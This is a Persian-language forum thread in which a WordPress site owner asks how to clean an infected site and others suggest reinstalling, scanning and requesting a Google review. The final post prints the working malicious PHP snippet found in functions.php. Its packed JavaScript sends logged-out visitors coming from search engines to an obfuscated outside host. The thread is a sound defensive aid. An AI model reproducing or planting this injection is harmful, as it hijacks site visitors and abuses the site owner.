دوستان یه سایت روی سرور ما هست که ویروسی شده با مرورگر اینترنت اکسپرورر با لا نمیاد ولی بافایرفاکس پس از اعلام ویروسی بودن بالا میاد . دوستان چطور میشه مشکل رو حل کرد ؟
نمایش نسخه قابل چاپ
دوستان یه سایت روی سرور ما هست که ویروسی شده با مرورگر اینترنت اکسپرورر با لا نمیاد ولی بافایرفاکس پس از اعلام ویروسی بودن بالا میاد . دوستان چطور میشه مشکل رو حل کرد ؟
احتمالا عکس که جای دیگه اپلود شده رو لینک دادن تو سایت شما و سایت شما مشکل دار شده
اگر این مورد نیست از انتیویروس استفاده کنید
تمام محتویات سایت جز پوشه wp-content رو پاک کنید. پوشه باقی مانده را کاملا ویروس یابی کنید. دوباره محتویات وردپرس را بریزید.
این کار رو انجام دادم صفحه سفید میاد
دوست عزیز شما ورد پرس رو پاک کردید :|
اگر میخواستید ویروس یابی کنید فرقی نمیکرد اگر پوشه های دیگه رو پاک نمیکردید
سعی کنید تو این مسائل زود تصمیم نگیرید
با سلام به احتمال زیاد این ارور رو نمیده ؟!
JS/Redirector.NIL trojan
connection terminated - quarantined PEYMAN-3ED72E88\PEYMAN Threat was detected upon access to web by
the application: C:\Program Files\Mozilla Firefox\firefox.exe.
اگه این ارور بود تو قالب باید دنبال یه همچین چیزی بگردید و حذف کنید!
فایل پیوست 4872
بهترین راه حذف و پیشگیری همیشگی هست و بهتره زودتر اقدام کنید تا گوگل شما رو سایت ویروسی نشون نداده!!!
بک آپ بگیرید از کل فایلهاتون.. دانلودش کنید.. سپس کل فایلهای روی هاست رو پاک کنید به غیر از فایلهای حجیم دانلودی (البته اگر هست) بعد وردپرس نسخه سالمش رو دانلود کنید و دوباره آپلود کنید تا سایتتون بالا بیاد.. تا اینجا دیگه اثری از ویروس دیگه تو سایتتون نمیمونه.. حالا فایلهای غیر وردپرسی مثل عکسها و.. رو اول ویروس یابی کنید بعد کم کم آپلود کنید سر جاش..
مگه عیبی داره دوست عزیز!
---------- Post added at 10:55 AM ---------- Previous post was at 10:54 AM ----------
حتما یک جای کارتون اشتباه کردید.
فقط پوشه wp-content رو دست نزنید هیچ مشکلی پیش نمیاد.
اگر دوست داشتید لینک رو بفرستید چک کنم.
بینید خودتون سایت رو :
سینمای دیگر - وب سایت شخصی رضا یوسفی فیلمساز
سلام دوست عزیزنقل قول:
نوشته اصلی توسط adamak
به این تاپیک یک سری بزنید:
hacked | ExpressionEngine Community Forums
لطف می کنید بگید از کجا هاستتون رو خریداری کردید؟
افزونه antivirus رو نصب کنید
از این سایت هم استفاده کنید
Sucuri SiteCheck - Free Website Malware Scans
این سایت بعد از اسکن چه کاری انجام میده ؟نقل قول:
نوشته اصلی توسط DownloadLearn
---------- Post added at 01:05 AM ---------- Previous post was at 12:55 AM ----------
این سایت بعد از اسکن چه کاری انجام میده ؟نقل قول:
نوشته اصلی توسط DownloadLearn
فایلهای قالب رو چک کن به همراه فایل های ایندکس سایت
فقط یک راه حل وجود داره برا این مشکل
شما سایت رو اینجا ثبت کن :
https://www.google.com/webmasters/tools/home?hl=en
بعد طبق این صفحه قالب سایت رو بررسی کن :
StopBadware - Tips for Cleaning & Securing Your Website
بعد درخواست بازبینی رو بفرست اگر این کار رو نکنی مشکل حل نمیشه.
request review
قالبرو دوباره آپلود کردم تو اکسپرورر درست شد حالا فایرفاکس گیر میده به ویروسی بودن
با سلام اون کاری رو که تو پست بالا گفتم انجام بدی 2-3 روزه حل میشه.نقل قول:
نوشته اصلی توسط adamak
وارد وبمستر تولز گوگل شید ببینید برای کدوم صفحه و کجا اینفکشن رو معرفی کرده.
همینطور بعد نصب کاسپر اسکای اینترنت سکیوریتی ببینید چه ویروسی رو میشناسه.
میتونید از دیتابیس بک آپ بگیرید و ورد پرس ور تم رو از نو نصب کنید یا از یه متخصص بخواید سایتتوم رو تمیز کنه
احتمال میدم ویروس ie frame باشه. اینطور راحت حل میشه. همینطور ممکنه هاست اشتراکی باشه که یک سایت آلوده با IP مشترک با شما باعث این شده باشه(احتمال کم)
---------- Post added at 12:53 AM ---------- Previous post was at 12:48 AM ----------
وارد وبمستر تولز گوگل شید ببینید برای کدوم صفحه و کجا اینفکشن رو معرفی کرده.
همینطور بعد نصب کاسپر اسکای اینترنت سکیوریتی ببینید چه ویروسی رو میشناسه.
میتونید از دیتابیس بک آپ بگیرید و ورد پرس ور تم رو از نو نصب کنید یا از یه متخصص بخواید سایتتوم رو تمیز کنه
احتمال میدم ویروس ie frame باشه. اینطور راحت حل میشه. همینطور ممکنه هاست اشتراکی باشه که یک سایت آلوده با IP مشترک با شما باعث این شده باشه(احتمال کم)
هر چند تاپیک قدیمیه ولی گفتم اگر کسی مشکلو پیدا کرد با گوگل به اینجا رسید مشکلش حل بشه .
باید این کد رو از functions.php پاک کنید :
کد PHP:<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>